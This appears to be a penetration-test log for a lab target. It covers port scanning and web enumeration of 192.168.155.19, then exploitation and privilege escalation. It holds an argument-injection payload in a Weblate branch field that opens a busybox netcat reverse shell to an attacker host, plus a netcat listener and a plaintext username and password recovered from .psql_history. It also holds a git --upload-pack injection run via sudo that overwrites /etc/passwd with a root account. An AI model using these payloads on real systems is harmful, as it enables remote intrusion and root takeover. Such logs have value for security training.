Fikklish

๐Ÿงช Pentest Log: {{date:2025-07-02}}

๐Ÿ” Target Information


๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.155.19 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV 192.168.155.19 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.155.13 -oN udp_scan_result.txt

Port 22

ssh tom@192.168.155.19

Port 80

Web Content Enumeration

gobuster dir -u http://192.168.155.19 -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://192.168.155.19

wpscan -url http://192.168.155.19

dirsearch -u http://192.168.155.19 -r -o dirsearch.txt


๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://security.snyk.io/vuln/SNYK-PYTHON-WEBLATE-2414088

Repository branch: --config=alias.pull=!busybox nc 192.168.45.163 8000 -e /bin/bash>/tmp/test.txt


nc -lvnp 8000

found tom's password under .psql_history

tom:RollingShockingLifter231

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

sudo -l

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿงช Vulnerability Details

https://security.snyk.io/vuln/SNYK-RUBY-GIT-2421270

๐Ÿ”ง Exploit Steps

sudo /home/tom/checkout.rb

hack
sudo /home/tom/fetch.rb

hack

--upload-pack=echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
su tony